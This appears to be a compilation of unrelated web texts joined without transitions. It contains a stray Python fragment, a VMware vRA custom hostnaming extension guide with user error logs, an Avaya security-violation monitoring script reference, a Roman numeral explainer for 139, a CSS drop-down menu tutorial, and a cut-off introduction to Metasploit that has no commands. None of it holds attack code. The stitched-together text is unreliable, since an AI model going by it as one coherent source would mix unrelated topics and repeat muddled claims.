for i in my_string:
    str = i + str
VMware vRealize Automation – vRA7 – Custom Hostnaming Extension for vRA7 and beyond
Caution: Articles are written for technical, not grammatical, accuracy. If poor grammar offends you, proceed with caution ;-)
THIS EXTENSION IS NO LONGER MAINTAINED
I want to thank all of you that have downloaded and used this module. We never expected it to be as widely used as it has been. We decided to stop maintaining this because it was originally built as an example of how one could achieve this capability. Much to our surprise it has been deployed into countless production environments. As a result we have received countless requests for support which we cannot provide.
There is good news, however. There is a commercially available, supported product that is capable of doing much more than this module. For more information, see the article on the SovLabs Hostname Module.
Overview
One of the most frequent asks when using vRA is, "How do I deploy machines using my company's hostnaming standards automatically using vRA?" Since the out-of-the-box hostnaming only provides a way to do prefix-suffix, the answer to this question usually is that it will require customization.
This solution is intended to provide a way to implement this functionality by using a small, highly versatile custom extension which can handle 95% of use cases without writing custom code.
The rest of this article contains instructions on installing and configuring the vRA Custom Hostnaming Extension. This extension allows administrators to model very specific custom hostnaming schemes for their vRA virtual machines, Deployments, and vCloud Director vApps using vRA custom properties, with dynamic creation of stock machine prefixes and index tracking for each unique hostname combination.
This extension is proof-of-concept or demo grade. While it runs well and consistently, it has not been put through a formal quality assurance process, so please use with caution.
See article on SovLabs Hostname Module
Changelog
v4.0
• Upgraded for vRA 7.0 (no longer supports vRA 6.x)
• Property names simplified
v3.1-
For support for vRA 6.x and below, go to:
http://dailyhypervisor.com/vcloud-automation-center-vcac-5-2-custom-hostnaming-extension/
Installation
These installation instructions assume the following:
• You have a working vRealize Orchestrator in your environment.
• You have a working knowledge of administering vRO.
• The vRealize Automation plugin for vRO has been installed, and both a vRA catalog and IaaS host has been added.
• You have the vRealize Orchestrator instance configured as an endpoint in vRealize Orchestrator in the Infrastructure configuration.
• vRA 7+ is preconfigured with at least one working Blueprint with at least one machine component.
Follow the steps below to perform the installation:
1. Download com.dailyhypervisor.vra.customhostname.package from the link above and copy it onto the local file system where you will run the vRealize Orchestrator client.
2. Import com.dailyhypervisor.vra.customhostname.package into your vRO instance.
3. Run the workflow Daily Hypervisor > vRealize Automation > Custom Hostname > Install custom hostname extension.
4. Choose the vRA catalog and IaaS host where you’d like to install the extension and click Submit.
Configuration
To configure vRA to use the custom hostnaming extension, perform the following steps:
image
1. Go to Administration > Property Dictionary > Property Groups.
2. Find the Custom Hostname Properties Template, with its name preceded by a date stamp.
3. Click Copy to create your own Property Group containing the correct properties for custom hostnaming.
image
4. On the Create Property Group page, change the name to reflect this configuration.
5. [Optional] Change the description to reflect this configuration.
6. You will now have all of the custom hostnaming extension properties in your Property Group. Edit the properties list to reflect your desired configuration using the property explanations and/or example below.
Extensibility.Lifecycle.Properties.VMPSMasterWorkflow32.Requested
This property is defined in order to tell vRA's Event Broker which of the machine's custom properties to send to the custom hostnaming workflow. The default value of "*" tells EB to send all of the machine's properties. This is required. DO NOT CHANGE OR REMOVE THIS PROPERTY.

Custom.SetCustomHostname.Execute
The existence of this property triggers the custom hostnaming workflow to run. This must be specified to leverage the extension's functionality.
Note: The value is set to "true" by default. DO NOT CHANGE THIS. It requires an exact match, including case, in order to trigger the workflow.

Custom.ComponentMachine.HostnameScheme
This property's value represents the hostnaming scheme you are using for a component or single machine. The format of this scheme looks something like this: {part1}{part2}{##}. The parts enclosed in curly brackets represent the names of custom properties whose values you'd like to plug in to those slots. The {##} indicates that you would like a two-digit auto-incrementing index placed in that slot. Anything not in curly brackets is placed in the hostname as-is.

Custom.Deployment.HostnameScheme [not working yet]*
This property is identical to the one above, except that this scheme gets applied to a Deployment or vCloud Director vApp instead of a component or single machine.

Custom.ComponentMachine.NoIndexOnFirst
Adding this property and setting the value to "true" causes the workflow not to add the index to the hostname on the first instance of each unique name.

Custom.Deployment.NoIndexOnFirst [not working yet]*
This property is identical to the one above, except that it applies to a Deployment or vCloud Director vApp instead of a component or single machine.

Custom.Hostname.OwnerShortNameIdentifier
If this property is specified, it indicates to the custom hostnaming workflow that this value is the identifier of the part of the hostname scheme where the short username (no domain and backslash) of the owner should be placed. For instance, if you specified this property with a value of USR, any part of the hostname scheme where {USR} is specified will be replaced with the owner’s short username.
7. Click OK to save the Property Group.
8. Set the properties you will use as parts to the hostname scheme in the appropriate locations.
9. Add the Property Group you configured to the appropriate location.
Examples
Let’s configure an example custom hostname scheme to get a working understanding of the functionality. We will build a single machine hostname scheme.
1. The first step is to create a Property Group for the configuration.
2. Since we are configuring for a single machine, delete the Custom.Deployment.HostnameScheme and Custom.Deployment.NoIndexOnFirst properties altogether.
3. Also, let’s exclude the owner short username and index removal functionality for this example, so delete Custom.Hostname.OwnerShortNameIdentifier and Custom.ComponentMachine.NoIndexOnFirst.
4. Edit the Custom.ComponentMachine.HostnameScheme property value to model the following use case:
• This scheme has four parts: a location identifier, a group identifier, an application identifier, and an auto-incrementing index, respectively.
• Use LOC for location, GRP for group, and APP for application.
Your hostname scheme should look like this: {LOC}{GRP}{APP}{###}. You will end up with a new Property Group as shown below.
image
5. Now we need to configure the custom properties for each variable identifier in the scheme. Location ties most closely to the Endpoint, Compute Resource, or Reservation, so let’s take advantage of the custom property hierarchy and specify it on the Endpoint.imageI set LOC (our location identifier) to ACY to represent Atlantic City.
6. Group will be specified at the Business Group level, so in my Development Business Group, I created a property named GRP with the value DEV.image
7. The APP identifier’s value will be unique to the machine. So I went to my CentOS 6.6 x64 Blueprint, selected my vSphere Machine on the Design Canvas, and created a property named APP, with a value of LNX for Linux.image
8. Also, be sure to select the Property Group we created in order to tie the hostname scheme properties to machine builds from this Blueprint. Of course, you can specify this anywhere in the property hierarchy that supports Property Groups.imageBy putting three # symbols in for the index, we are indicating that it will be three digits. Since it will be the first time using this hostname combination, the extension should dynamically create a new Machine Prefix, and the index should start at 001 and increment from there.
9. So, if I request a CentOS Linux 6.6 x64 on the vCenter Endpoint in Atlantic City as a member of the Development group, my end result should be…
ACYDEVLNX001
A test reveals that the custom hostnaming extension does its job.
image
Custom Deployment and vCloud Director vApp Naming [not working]*
Custom Deployment and vApp naming works in an almost identical way. However, there are two differences to note.
1. It uses a different hostname scheme property. Instead of Custom.ComponentMachine.HostnameScheme as in our previous example, the workflow looks for Custom.Deployment.HostnameScheme. The reason for this is to allow component machines to have different naming schemes than their parent. Component machines inherit properties from the parent Deployment or vApp, and when the same property is specified on both levels, the parent property overrides that of the component machine. Therefore, without separate properties, component machines would be forced to implement the same hostnaming scheme as the parent Deployment or vApp.
2. Deployments do not inherit all of the same properties as component machines. Namely, they do not inherit properties from placement entities, such as Endpoints, Compute Resources, and Reservations. This is because Deployments themselves do not reside anywhere or consume resources. They are simply a logical grouping of actual machines. The component machines are the ones that are actually placed on infrastructure, and it’s possible to configure a Deployment with component machines that can or will end up on different resources, even in different locations. So it becomes impossible to logically tie Deployments to singular infrastructure. vApps, on the other hand, do support locations, as vCloud Director and vRA both consider them as located in the organization vDC, along with their component virtual machines. In other words, if you were to use the value of Custom.ComponentMachine.HostnameScheme in our previous example as the value of Custom.Deployment.HostnameScheme in a Deployment, you would get an error, because it will not find a property named LOC.
Adding the Owner’s Short Username to a Custom Hostnaming Scheme
One additional function you can use that we did not explore in our example is adding an owner’s short username (without the domain and backslash) as a part of the hostname.
To do this, you can simply specify one additional property, Custom.Hostname.OwnerShortNameIdentifier. Set the value of this property to the identifier you will use in your hostname scheme to specify where to place the username.
Here’s an example of a Property Group created for this scenario:
image
If I logged in as [email protected] and requested a machine from a Blueprint with this scheme enabled, I could expect the machine to be named like this:
image
* Not currently working due to product regression and/or lack of documentation
23 Replies to “VMware vRealize Automation – vRA7 – Custom Hostnaming Extension for vRA7 and beyond”
1. Wanted to install your Workflow but always getting mistakes:
[2016-04-18 10:04:06.218] [I] {“type”:”and”,”subClauses”:[{“type”:”expression”,”operator”:{“type”:”equals”},”leftOperand”:{“type”:”path”,”path”:”data~lifecycleState~state”},”rightOperand”:{“type”:”constant”,”value”:{“type”:”string”,”value”:”VMPSMasterWorkflow32.Requested”}}},{“type”:”expression”,”operator”:{“type”:”equals”},”leftOperand”:{“type”:”path”,”path”:”data~lifecycleState~phase”},”rightOperand”:{“type”:”constant”,”value”:{“type”:”string”,”value”:”POST”}}},{“type”:”expression”,”operator”:{“type”:”equals”},”leftOperand”:{“type”:”path”,”path”:”data~machine~properties~Custom.SetCustomHostname.Execute”},”rightOperand”:{“type”:”constant”,”value”:{“type”:”string”,”value”:”true”}}}]}
[2016-04-18 10:04:07.137] [E] Error in (Workflow:Install state change workflow extension / Prepare params (item1)#67) 403 Forbidden
[2016-04-18 10:04:07.190] [E] Workfow execution stack:
***
item: ‘Install state change workflow extension/item1’, state: ‘failed’, business state: ‘null’, exception: ‘403 Forbidden (Workflow:Install state change workflow extension / Prepare params (item1)#67)’
workflow: ‘Install custom hostname extension’ (d86f3b49-db74-45d0-9c08-9bf6d2e8e3c9)
| ‘attribute’: name=workflowDescription type=string value=Runs a vRO workflow for custom hostnaming
| ‘attribute’: name=vCACMachineState type=string value=Requested
| ‘attribute’: name=vCACWorkflowPriority type=number value=1.0
| ‘attribute’: name=vCACWorkflowTiming type=string value=Post
| ‘attribute’: name=vCACWorkflowTriggerProperty type=string value=Custom.SetCustomHostname.Execute
| ‘attribute’: name=propertySetDetails type=Array/CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails value=#{#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string#true#+#name#=#string#Custom.SetCustomHostname.Execute#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string##+#name#=#string#Custom.Deployment.HostnameScheme#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string##+#name#=#string#Custom.ComponentMachine.HostnameScheme#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string#USR#+#name#=#string#Custom.Hostname.OwnerShortNameIdentifier#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string#true#+#name#=#string#Custom.Deployment.NoIndexOnFirst#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string#true#+#name#=#string#Custom.ComponentMachine.NoIndexOnFirst#]##}#
| ‘attribute’: name=propertySetName type=string value=Custom Hostname Properties Template
| ‘attribute’: name=propertySetDescription type=string value=Properties for Custom Hostnaming Extension v4
| ‘attribute’: name=setCustomHostnameWorkflow type=Workflow value=dunes://service.dunes.ch/Workflow?id=’5febfe67-9247-4f72-a072-59c1ce5c2ec1’&dunesName=’Workflow’
| ‘attribute’: name=environmentConfigElement type=ConfigurationElement value=dunes://service.dunes.ch/ConfigurationElement?id=’86e55a3e-73f6-428b-b21f-a69ac280281c’&dunesName=’ConfigurationElement’
| ‘attribute’: name=vCACHostAttributeName type=string value=vraIaasHost
| ‘attribute’: name=vcoWorkflowAsync type=boolean value=false
| ‘attribute’: name=workflowTimeout type=number value=60.0
| ‘attribute’: name=workflowSubscriptionVersion type=string value=0.0.1
| ‘attribute’: name=vcacCafeHostAttributeName type=string value=vraHost
| ‘input’: name=vraCatalogHost type=vCACCAFE:VCACHost value=dunes://service.dunes.ch/CustomSDKObject?id=’1553d476-520d-4cb9-9f6b-86022db0ec96’&dunesName=’vCACCAFE:VCACHost’
| ‘input’: name=vraIaasHost type=vCAC:VCACHost value=dunes://service.dunes.ch/CustomSDKObject?id=’181f6d42-304c-4b2e-9cb2-fe7c3af287ba’&dunesName=’vCAC:VCACHost’
| ‘no outputs’
–workflow: ‘Install state change workflow extension’ (7d047254-e1a4-46d4-8071-57c3dda3fec5)
| ‘attribute’: name=vroWorkflowName type=string value=
| ‘attribute’: name=blocking type=boolean value=true
| ‘attribute’: name=status type=string value=
| ‘attribute’: name=workflowCriteria type=string value=
| ‘attribute’: name=eventTopic type=vCACCAFE:EventTopic value=__NULL__
| ‘attribute’: name=propertySetDetailsWithEbProperty type=Array/CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails value=__NULL__
| ‘attribute’: name=propertyGroupNameWithTimestamp type=string value=
| ‘input’: name=vCOWorkflow type=Workflow value=dunes://service.dunes.ch/Workflow?id=’5febfe67-9247-4f72-a072-59c1ce5c2ec1’&dunesName=’Workflow’
| ‘input’: name=workflowDescription type=string value=Runs a vRO workflow for custom hostnaming
| ‘input’: name=vCACMachineState type=string value=Requested
| ‘input’: name=vCACWorkflowPriority type=number value=1.0
| ‘input’: name=vCACWorkflowTiming type=string value=Post
| ‘input’: name=vCACWorkflowTriggerProperty type=string value=Custom.SetCustomHostname.Execute
| ‘input’: name=propertySetDetails type=Array/CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails value=#{#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string#true#+#name#=#string#Custom.SetCustomHostname.Execute#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string##+#name#=#string#Custom.Deployment.HostnameScheme#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string##+#name#=#string#Custom.ComponentMachine.HostnameScheme#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string#USR#+#name#=#string#Custom.Hostname.OwnerShortNameIdentifier#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string#true#+#name#=#string#Custom.Deployment.NoIndexOnFirst#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string#true#+#name#=#string#Custom.ComponentMachine.NoIndexOnFirst#]##}#
| ‘input’: name=propertySetName type=string value=Custom Hostname Properties Template
| ‘input’: name=propertySetDescription type=string value=Properties for Custom Hostnaming Extension v4
| ‘input’: name=vcoWorkflowAsync type=boolean value=false
| ‘input’: name=workflowTimeout type=number value=60.0
| ‘input’: name=vraCatalogHost type=vCACCAFE:VCACHost value=dunes://service.dunes.ch/CustomSDKObject?id=’1553d476-520d-4cb9-9f6b-86022db0ec96’&dunesName=’vCACCAFE:VCACHost’
| ‘input’: name=workflowSubscriptionVersion type=string value=0.0.1
| ‘no outputs’
*** End of execution stack.
Do you know what I’m doing wrong?!
By the way is it possible to install your AD Computer Management Workflows in vRealize 7??
Greetz
Susie
1. Hi Susie, We’ve used the Custom Host Naming module from SovLabs that they support as new vRA versions are released. They also have modules in their vRO plug-in framework for AD security groups and OUs, Infoblox, Bluecat, Puppet, Chef, ServiceNow, Netscaler, F5, and Cisco ASA. More at http://www.sovlabs.com
2. Thanks Tom. We’ve used the Custom Host Naming module from SovLabs that they support as new vRA versions are released. They also have modules in their vRO plug-in framework for Infoblox, Bluecat, Puppet, Chef, ServiceNow, AD security groups and OUs, Netscaler, F5, and Cisco ASA. More at http://www.sovlabs.com
3. Hello, First I tried the “Install custom hostname extension” WF but same error above. Below is “Create Property Group” WF log. Is there any fixed version or are we missing something while running the WFs. Thanks
2016-05-08 02:51:41.741+0300 : ERROR : Error in (Workflow:Create property group / Create Property Group (item14)#54) Data serialization error.
2016-05-08 02:51:41.792+0300 : ERROR : Workfow execution stack:
***
item: ‘Create property group/item14’, state: ‘failed’, business state: ‘null’, exception: ‘Data serialization error. (Workflow:Create property group / Create Property Group (item14)#54)’
workflow: ‘Create property group’ (0b8de383-dbc4-4af8-8259-33c1671cd995)
| ‘input’: name=propertyGroupDetails type=Array/CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails value=null
| ‘input’: name=propertyGroupName type=string value=
| ‘input’: name=propertyGroupDescription type=string value=
| ‘input’: name=vraCatalogHost type=vCACCAFE:VCACHost value=dunes://service.dunes.ch/CustomSDKObject?id=’1b22c263-11f7-46e1-a248-0ff7beccf7a5’&dunesName=’vCACCAFE:VCACHost’
| ‘no outputs’
| ‘no attributes’
*** End of execution stack.
1. What workflow did you run to install the package? You should be running the “Install Custom Hostname” workflow. Not the one under the install folder. Please confirm you are running the appropriate install workflow. When you run it you will need to select the proper Catalog (vRA Appliance) and IaaS (Windows Server) hosts. Please ensure you are choosing the proper host as well.
1. Running that same error here…
Running correct Workflow… version 7.0.1
[2016-05-17 17:33:38.797] [E] Error in (Workflow:Create property group / Create Property Group (item14)#54) 403 Forbidden
[2016-05-17 17:33:38.826] [E] Workfow execution stack:
***
item: ‘Create property group/item14’, state: ‘failed’, business state: ‘null’, exception: ‘403 Forbidden (Workflow:Create property group / Create Property Group (item14)#54)’
workflow: ‘Install custom hostname’ (
1. It looks like the account use to create the vRA endpoint for the tenant in vRO doesn’t have the necessary permissions in vRA. Check the account permission and the vRA endpoint in vRO. It should be specific to the tenant that you are working with.
4. Found the fix to my environment…. when registering the vRA host in vRO under vRealize Automation, do not use the “Add a vRA host using component registry” instead use the “Add a vRA host” workflow. Then when you register the plugin it works fine.
5. Trying to install the extention and get an error at this point:
Run the workflow Daily Hypervisor > vRealize Automation > Custom Hostname > Install custom hostname extension.
vRO pops up and says “Validation process report 4 errors in the workflow. Disable validation checking in the preferences or correct the errors”.
I’m not sure what its angry about.
6. Installed the modules and everything works great except the numbering scheme. I am using three digits so {###} and it gets picked up fine, but the first machine name is always missing any numbers after the name and the second machine always goes to 002 rather than 001. Has anyone else seen this?
7. Thanks for updating this to work with 7! I did notice a small item regarding multi-tenancy. It looks like you can only run the install for a single tenant. When I deployed this I deployed it to the default tenant which worked great, but when I ran the install workflow for a subtenant the workflow skipped creating the EBS. Once I deleted the EBS from the default tenant and then ran the install again against the subtenant it correctly created the EBS for the subtenant. I haven’t dug into it yet but I suspect it might be something to do with the switch script in the workflow. Thanks again for all of your hard work!
8. Why vra 7 limit number of machine prefix to 30 instead of Unlimited
When a acces to Blueprint configuration, I can see only the first 30 Machine Prefix. the 31 32 … will be removed from blueprints configured earlier.
I hope to find the solution asap
Many thank’s
9. Hi,
Did you manage to get anywhere with manipulating vRA 7 Deployment names/attributes?
I too am unable to determine how to do (was easy in vCAC 6 using the parent object of vCAC VM entity).
Bit of a limitation at the moment so if you have any further info on the subject would be gratefully received.
Many thanks
10. I think this is because of this property in the property group of the custom hostname properties:
Custom.ComponentMachine.NoIndexOnFirst
11. Hello,
I’m having randomly the following issue causing the renaming not to work:
———————–
You cannot use snapshot isolation to access table ‘dbo.VirtualMachine’ directly or indirectly in database ” to update, delete, or insert the row that has been modified or deleted by another transaction. Retry the transaction or change the isolation level for the update/delete statement
———————–
I checked https://technet.microsoft.com/en-us/library/ms175095(v=sql.105) and both READ_COMMITTED_SNAPSHOT and ALLOW_SNAPSHOT_ISOLATION are ON.
Any help is appreciated.
Thank you
1. Unfortunately the custom naming module along with some of the others are no longer maintained. Sorry you are having difficulties with it, hope you have successfully resolved your issues.
12. Hi
My customer have different custom property to choose DataCenter location Environment and Network in BP Form. So, before i defined prefix machine but my BP is Dynamical (Production/Dev) and it’s not compatible with that. The convention name is depend of user choice How to define structure name with input user parameter from Blueprint form ?
Thanks
Best Regard
Mikael
3.22 SecurityViolations
Use this Knowledge Script to monitor the following security violations:
• Barrier code violations
• Calls that generated authorization code violations
• Calls that generated station security code violations
NOTE:If you bypass SNMP to discover a call manager, this script is not available.
Barrier codes and authorization codes provide a level of security for remote call access to such telephony components as PBXs, switch features, and trunks. Station security codes enable the Personal Station Access feature and the Extended User Administration of Redirected Calls feature.
This script raises an event if a threshold is exceeded. In addition, this script generates data streams for monitored violations.
3.22.1 Resource Object
AvayaCM Active SPE object
3.22.2 Default Schedule
By default, this script runs every 5 minutes.
3.22.3 Setting Parameter Values
Set the following parameters as needed:
Parameter
How to Set It
General Settings
Job Failure Notification
Event severity when job fails
Set the event severity level, from 1 to 40, to indicate the importance of the failure of the SecurityViolations job. The default is 5.
Select port type to monitor
Select the type of login port you want to monitor for security violations. Choose from the following:
• All (default)
• SYSAM-LCL (local port)
• SYSAM-RMT (remote port)
• MAINT (maintenance port)
• SYS-Port (system port)
• MGR1 (management terminal connection port)
• NET (network controller port)
• EPN (EPN maintenance EIA port)
• INADS (initialization administration system port)
Enable use of SNMP GETBulk operations?
By default, this parameter is enabled, allowing the SecurityViolations Knowledge Script job to use GETNext and GETBulk SNMP requests to access Communication Manager MIBs.
Disable this parameter to allow the script to use only GETNext requests.
Not all MIB tables are extensive enough to need a GETBulk request.
A GETBulk request is faster, but more CPU-intensive than GETNext.
Number of rows to request for each GETBulk operation
Specify the number of rows from the MIB table to return in a GETBulk request. The default is 10 rows.
The number of rows determines how quickly MIB data is returned.
If CPU usage is too high, you can reduce the number of rows per GETBulk or disable the Enable use of SNMP GETBulk requests? parameter.
Interval to pause between GETBulk operations
Specify the number of milliseconds to wait between GETBulk requests. The default is 100 milliseconds.
The length of delay can help with managing CPU usage and speed of SNMP requests.
For example, a one-row GETBulk with a 100-millisecond delay between requests executes more slowly and uses less CPU than a GETNext request.
Monitor Violations for Barrier Codes
Event Notification
Raise event if number of violations for barrier codes exceeds threshold?
Select Yes to raise an event if the number of security violations for barrier codes exceeds the threshold you set. The default is Yes.
Threshold - Maximum violations for barrier codes
Specify the highest number of security violations for barrier codes that can occur before an event is raised. The default is 0 violations.
Event severity when number of violations for barrier codes exceeds threshold
Set the event severity level, from 1 to 40, to indicate the importance of an event in which the number of security violations for barrier codes exceeds the threshold. The default is 15.
Data Collection
Collect data for number of violations for barrier codes?
Select Yes to collect data for charts and reports. If enabled, data collection returns the number of security violations for barrier codes that occurred during the monitoring period. The default is unselected.
Monitor Violations for Authorization Codes
Event Notification
Raise event if number of calls that generated authorization code violations exceeds threshold?
Select Yes to raise an event if the number of calls that generated authorization code violations exceeds the threshold you set. The default is Yes.
Threshold - Maximum number of calls that generated authorization code violations
Specify the highest number of calls that can generate authorization code violations before an event is raised. The default is 0 calls.
Event severity when the number of calls that generated authorization code violations exceeds threshold
Set the event severity level, from 1 to 40, to indicate the importance of an event in which the number of calls that generated authorization code violations exceeds the threshold. The default is 15.
Data Collection
Collect data for the number of calls that generated authorization code violations?
Select Yes to collect data for charts and reports. If enabled, data collection returns the number of calls that generated authorization code violations during the monitoring period. The default is unselected.
Monitor Station Violations
Event Notification
Raise event if the number of calls that generated station violations exceeds threshold?
Select Yes to raise an event if the number of calls that generated station violations exceeds the threshold you set. The default is Yes.
Threshold - Maximum number of calls that generated station violations
Specify the highest number of calls that can generate station violations before an event is raised. The default is 0 calls.
Event severity when the number of calls that generated station violations exceeds threshold
Set the event severity level, from 1 to 40, to indicate the importance of an event in which the number of calls that generated station violations exceeds the threshold. The default is 15.
Data Collection
Collect data for the number of calls that generated station violations?
Select Yes to collect data for charts and reports. If enabled, data collection returns the number of calls that generated station violations during the monitoring period. The default is unselected.
CXXXIX Roman Numeral | How to Write CXXXIX in Roman Numerals?
CXXXIX Roman Numeral
The sophisticated art of translating CXXXIX Roman Numerals into Hindu-Arabic numerals requires a deep understanding of the intricate value system of the Roman numerals. The elegant simplicity of CXXXIX, which translates to 139, is achieved by combining the values of each symbol in the sequence CXXXIX= C + XXX + IX = 100 + 30 + 9 = 139. This strategic placement of higher Roman numerals preceding lower numerals results in the accurate conversion of Roman numerals to Hindu-Arabic numerals. Join us in exploring this fascinating process in this informative article.
Roman NumeralNumber
CXXXIX139
CXXXIX in Roman Numerals
How to Write CXXXIX Roman Numerals?
How to Write CXXXIX Roman Numerals
How to Write CXXXIX Roman Numerals
There are 2 method to write CXXXIX Roman numeral in number:
1st Method to write CXXXIX Roman Numerals
In this method, we need to break the CXXXIX Roman Numerals into single letters such as: C,X,X,X,I,X and then add or subtract them as shown below.
CXXXIX = C + X + X + X + (X – I)
CXXXIX = 100 + 10 + 10 + 10 + (10 – 1)
CXXXIX = 100 + 30 + 9
CXXXIX = 139
2nd Method to write CXXXIX Roman Numerals
In this method we need to consider the groups of Roman Numerals Such as:
CXXXIX = C + XXX + IX
CXXXIX = 100 + 30 + 9
CXXXIX = 139
Hence, the Roman numerals CXXXIX written as 139 in number.
What are the Numbers Related to CXXXIX Roman Numerals?
There are many numbers related to CXXXIX Roman numerals. For example, the number 1139 can be written as MCXXXIX.
Numbers less than CXXXIX:
• CXXX = 130
• CXXXI = 131
• CXXXII = 132
• CXXXIII = 133
• CXXXIV = 134
• CXXXV = 135
• CXXXVI = 136
• CXXXVII = 137
• CXXXVIII = 138
Numbers greater than CXXXIX:
• CXL = 140
• CXLI = 141
• CXLII = 142
• CXLIII = 143
• CXLIV = 144
• CXLV = 145
• CXLVI = 146
• CXLVII = 147
What are the Basic Rules to Write Roman Numerals?
The ancient Romans used a system of letters for their numerals, where I, X, and C represented the values of 1, 10, and 100 respectively. The rules for combining these letters to express numbers were intricate, with additions and subtractions based on the relative sizes of the letters.
• For example, the letter CI represented 100 + 1 = 101, while XL represented 50 – 10 = 40.
• Additionally, repeating a letter 2 or 3 times added its value, as II equaled 1 + 1 = 2.
• However, a letter could not be used more than three times in a row.
• The letters V, L, and D were also not repeated. The system also allowed for subtractive notation, with only I, X, and C being eligible.
• This resulted in 6 combinations such as IV = 5 – 1 = 4, IX = 10 – 1 = 9, XL = 50 – 10 = 40, and so on.
CXXXIX Roman Numerals Examples
Frequently Asked Questions on CXXXIX Roman Numerals
What is the value of cxxxix?
The Value of cxxxix is 139 in number.
What is cxxxix roman numerals meaning?
The meaning of cxxxix roman numerals is 139 in words. It is written as follows:
CXXXIX = C + XXX + IX
C = 100
XXX = 30
IX = 9
How do I read CXXXIX in Roman Numerals?
CXXXIX is read as "139" in modern Arabic numerals. Each symbol represents a unique value, and when combined, they form the desired numerical representation. For example, CXXXIX = C + XXX + IX = 100 + 30 + 9 = 139.
what is cxxxix roman figure?
The Roman numeral CXXXIX represents the Arabic number 139.
About The Author
Knowledge Glow
I am Komal Gupta, the founder of Knowledge Glow, and my team and I aim to fuel dreams and help the readers achieve success. While you prepare for your competitive exams, we will be right here to assist you in improving your general knowledge and gaining maximum numbers from objective questions. We started this website in 2021 to help students prepare for upcoming competitive exams. Whether you are preparing for civil services or any other exam, our resources will be valuable in the process.
HTML and CSS only Drop Down Menu
Ok, let's keep this simple, that what you want after all isn't it!
The Look...
simple drop down menu
The Menu In Action...
And now the code...
The HTML...
Copy and paste the code below into your webpage. Edit the Text and links to suit your site.
The down arrow is achieved using the symbol code "& # x 2 5 B C" (without the spaces)
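The original HTML snippet isn't shown here, so below is a minimal example of markup that matches the .navbar selectors used in the CSS further down (the menu labels and structure are only illustrative). A nested ul inside a li becomes the drop down panel, and the down arrow is added with the &#x25BC; entity mentioned above:

<div class="navbar">
  <ul>
    <li>Home</li>
    <li>Tutorials &#x25BC;
      <ul>
        <li>HTML</li>
        <li>CSS</li>
        <li>Javascript</li>
      </ul>
    </li>
    <li>About</li>
  </ul>
</div>

In practice you would wrap each label in an <a> tag pointing at your own pages and add a small rule for the link colour, since the CSS below only styles the li elements.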
The CSS...
Copy and paste the code below into your CSS stylesheet. Edit the colours and padding to suit your site.
.navbar ul {
text-align: left;
display: inline;
margin: 0px ;
padding: 15px 4px 17px 0px ;
list-style: none ;
}
.navbar ul li {
font: bold 16px sans-serif;
color:#fff;
display: inline-block;
margin-right: -3px;
position: relative ;
padding: 15px 20px ;
background: #0099CC ;
}
.navbar ul li:hover {
background: #555;
color: #fff;
}
.navbar ul li ul {
padding: 0 ;
position: absolute;
top: 43px;
left: 0 ;
width: 180px ;
display: none ;
opacity: 0 ;
visibility: hidden;
-webkit-transition: opacity 0.2s ;
-moz-transition: opacity 0.2s ;
-ms-transition: opacity 0.2s ;
-o-transition: opacity 0.2s ;
transition: opacity 0.2s ;
}
.navbar ul li ul li {
background: #555 ;
display: block;
color: #fff ;
text-shadow: 0 -1px 0 #000;
}
.navbar ul li ul li:hover { background: #666; }
.navbar ul li:hover ul {
display: block ;
opacity: 1 ;
visibility: visible;
}
More web tips, templates and tutorials coming soon as part of our "month of web" at OnlineDesignTeacher. Follow us on Twitter and Facebook to be sure you don't miss out.
Metasploit Essentials
September 19, 2023
September 19, 2023 Jasper
Hi! It is time to look at the essentials of Metasploit, an extremely powerful framework that automates a part of the penetration testing process. This beginner's guide will walk you through the essential steps to get started with Metasploit, from installation to conducting your first penetration test. I will try to cover every step on the way to a successful exploit, while explaining basic concepts and theory.
I am making these walkthroughs to help solidify the knowledge I gain while on this exciting journey. I hope that it can help others as well. Join me in learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
metasploit logo
Introduction to Metasploit
Metasploit is a powerful penetration testing framework that allows cybersecurity professionals and ethical hackers to assess the security of networks and systems. To be more specific, Metasploit allows you to:
• Conduct network reconnaissance
• Find vulnerabilities on a target system
• Search for and run exploits abusing these vulnerabilities
• Transfer payloads and encode them
• Help with privilege escalation
